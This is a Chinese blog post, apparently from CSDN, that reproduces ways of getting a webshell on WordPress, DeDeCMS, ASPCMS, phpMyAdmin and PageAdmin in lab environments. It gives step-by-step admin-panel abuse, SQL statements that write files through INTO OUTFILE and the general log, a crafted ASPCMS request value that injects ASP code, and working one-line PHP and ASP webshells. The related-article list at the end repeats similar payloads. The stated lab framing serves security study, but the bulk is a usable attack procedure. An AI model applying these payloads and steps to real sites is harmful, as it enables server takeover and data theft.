CMS-GetShell漏洞复现

于 2024-08-05 19:49:17 发布
阅读量1.6k 收藏 20
点赞数 52
分类专栏: 漏洞复现 文章标签: web安全 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86440467/article/details/140916550
版权

一:WordPress

环境

使用虚拟机为centos7.6

确保docker与docker-compose已安装(如果有需要或者有时间,会做一篇安装流程)

下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载,不再演示)

进入 /vulhub/wordpress/pwnscriptum 目录下;使用命令docker-compose up -d 开启环境

如果启动失败,vim docker-compose.yml修改

将上面改为2.1,下面为端口自己随便选择一个未占用即可

 启动成功

方法一:后台修改模板获取shell

访问虚拟机ip加上wp-sadmin进入,进入外观-编辑-404php,在第一行添加<?php phpinfo(); ?>

在下面点击更新文件(获取shell传入一句话木马,演示使用探针)

拼接路径访问/wp-content/themes/twentyfifteen/404.php

方法二:上传主题获取shell

点击外观-主题,然后添加上传主题,在网上随便下载一个wordpress主题,将传入php与主题一同压缩为zip上传,安装

安装成功后,拼接访问/wp-content/themes/加上上传文件以及php文件

我上传为一句话木马,使用蚁剑测试连接成功

二:DeDeCMS

下载文件解压到小皮面板www目录下(需要文件可以私信),安装后拼接访问/uploads/dede

方法一:通过⽂件管理器上传获取shell

登录后台后,在核心-文件式管理器,点击文件上传上传一句话木马

测试连接,成功

方法二:修改模板文件获取shell

点击模板-默认模板管理,找到index.htm,修改保存

来到生成,更新主页HTML,看到主页模板没问题,生成静态,更新,浏览

方法三:后台任意命令执⾏获取Shell

来到模块,广告管理,增加广告,将上传木马写入广告内容当中保存

添加成功后,点击代码查看位置,来到蚁剑测试连接

方法四:sql写入获取shell

来到系统,sql命令行工具,输入语句指定文件生成位置,点击确定,查看

注意:使用into outfile需要mysql中my.ini中有secure_file_priv=''

三:ASPCMS

环境

下载文件,搭建在有IIS服务机器上(我使用虚拟机Windows Server 2012搭建环境)

将文件解压后,配置在IIS网站下(需要详细环境搭建流程私信,或者有时间会写)

拼接路径/admin_aspcms,访问登录

后台修改配置⽂件获取Shell

进入后点击拓展功能->幻灯片设置->保存,用BP进行抓包

修改包中slideTextStatus 字段的值为1%25><%25Eval(Request (chr(65)))%25><%25,放完包,使用参数为chr(65),参数为a

影响的文件为/config/AspCms_Config.asp,打开后可发现已经添加,使用蚁剑连接

四:PHPMyadmin

环境

使用小皮面板,来到软件管理找到phpmyadmin安装,安装完成后点击管理直接打开安装

方法一:通过⽇志⽂件拿Shell

登录后,点击sql输入以下语句执行

show global variables like '%general%';

发现日志保存状态未开启

输入以下语句执行,开启日志保存状态

set global general_log='on';

再次查看状态,已经开启

使用命令更改日志保存位置,查看是否成功

set global general_log_file = 'E:/phpStudy/phpstudy_pro/WWW/1.php'

使用语句将木马写入,使用蚁剑测试连接

select '<?php eval($_POST["cmd"]);?>';

方法二:导⼊导出获取Shell

通过sql语句判断目录,使用into outfile写入(使用条件看DeDeCMS方法四)

判断mysql位置使用命令

select @@datadir

www路径应当为E:/phpStudy/phpstudy_pro/www若不正确,进行删减判断,写入木马

select "<?php eval($_POST[a]);?>" into outfile 'E:/phpStudy/phpstudy_pro/www/2.php';

执行成功代表路径判断正确(保证目录下没有同名文件,否则会报错),蚁剑连接

方法三:界面图像化获取Shell

假如第一种方法无法使用into outfile时,通过此方法修改日志进行sql写入木马

点击变量,搜索输入gen来搜索日志

sql写入,蚁剑连接

select "<?php eval($_POST[a]);?>";

Pageadmin

环境同ASPCMS一样,下载安装于IIS,安装后,拼接admin,进入管理员页面

 

方法一:上传模块获得Shell

来到应用,插件安装上传一个含有木马的zip,若为授权版本会上传成功自动解压,直接连接即可

方法二:上传⽂件解压拿WebShell 

来到工具,文件管理上传带有一句话木马的zip,注意使用一句话木马为asp格式,内容为

 <%eval request("pass")%>

<%eval request("pass")%>

找到后解压,使用蚁剑连接

 此漏洞复现结束,若有疑问或是问题提出欢迎讨论

Jhin-Askeladd
关注
  • 52
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CMS漏洞复现
x594238758的博客
09-10 3816
CMS是英语Content Management System的缩写,按英语的字面翻译就是内容管理系统,顾名思义,它主要是为了方便发布网络内容而存在的一体化Web管理系统。很久很久以前,人们做网站很多用静态HTML+CSS+Javascript直接写,也就是静态页面。
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4774
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
74CMS漏洞复现
小小猪的博客
12-01 4255
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
EyouCms1.0前台GetShell漏洞复现
weixin_44897902的博客
12-08 3567
漏洞名称: EyouCms1.0前台GetShell 漏洞影响: EyouCms1.0 复现过程: url/index.php/api/Uploadify/preview 若出现: 则说明存在漏洞 <?php phpinfo(); 通过post数据: data:image/php;base64,PD9waHAgcGhwaW5mbygpOw== 页面返回: 访问:url/p...
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞shell)
信安小菜鸡的博客
05-19 3755
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
骑士CMS模版注入+文件包含getshell漏洞复现
玄道的网安博客
12-22 3178
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统 漏洞概述 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。 影响版本 骑士 CMS < 6.0.48 环境搭建 ...
cms支付漏洞系统】cmseasy漏洞复现
qq_70836100的博客
08-02 223
5.购买成功后查看账户,金额增加说明成功。4.抓包修改数量为-1,原来为1,放包。
YzmCMS跨站脚本漏洞(CVE-2020-22394)复现
玄道的网安博客
11-28 4719
简介 YzmCMS基于 PHP 的轻量级开源内容管理系统。 漏洞概述 YzmCMS v5.5版本存在跨站脚本漏洞,该漏洞源于编辑器中的member contribution function包含一个跨站点脚本(XSS)漏洞。 影响版本 YzmCMS v5.5 环境搭建 到官网下载源码 https://www.yzmcms.com/ 好像官网最近访问不了了,放个百度网盘的 https://pan.baidu.com/s/1y8_4FrGlUUrV0-LaGWJhWA 安装完成后 .
复现】常见CMS漏洞
最新发布
m0_59151303的博客
08-04 662
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
帝国CMS7.5漏洞复现
qq_52469895的博客
04-11 2537
首先去它的后台 http://127.0.0.1/upload/e/admin/index.php 账号密码root 依次 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据] 抓包把tablename改为phpifno() 注意这里只勾选一个就行了 然后点击备份开始抓包 将tablename改为phpifno 然后放包 看到这里就是刚刚的数据 查看备份说明然后将文件目录下的config.php,将readme.txt改为config.php
cmseasy漏洞复现
qq_52223347的博客
03-10 4497
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞复现 进入管理界面–》模块 --》编辑模
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 849
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
帝国cms7.5漏洞复现
xiaolong22333的博客
09-21 1477
在后台系统备份处,选择一个数据库后开始备份抓包 将tablename的值改为phpinfo() 然后在管理备份目录中查看,将readme.txt改为config.php 查看源码,在/admin/ebak/phome.php中 跟进Ebak_DoEbak,在/admin/ebak/class/functions.php中 获取tablename 遍历拼接 创建config.php并写入内容 可以看到,在获取tablename后遍历拼接,然后直接写入了config.php中,造成任意代码执行
xdcms漏洞合集-漏洞复现_xdcms漏洞复现,2024年最新写给正在求职的网络安全开发
uiuuyy67的博客
04-15 880
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3374
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
友点cms9.1 getshell漏洞
05-01
友点CMS9.1是一款国内常用的开源CMS系统,近日被指出存在一个getshell漏洞,该漏洞可允许攻击者通过构造特殊的请求参数向网站注入任意代码,并获取服务器的控制权。 经分析,该漏洞影响范围较广,可影响友点CMS9.1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值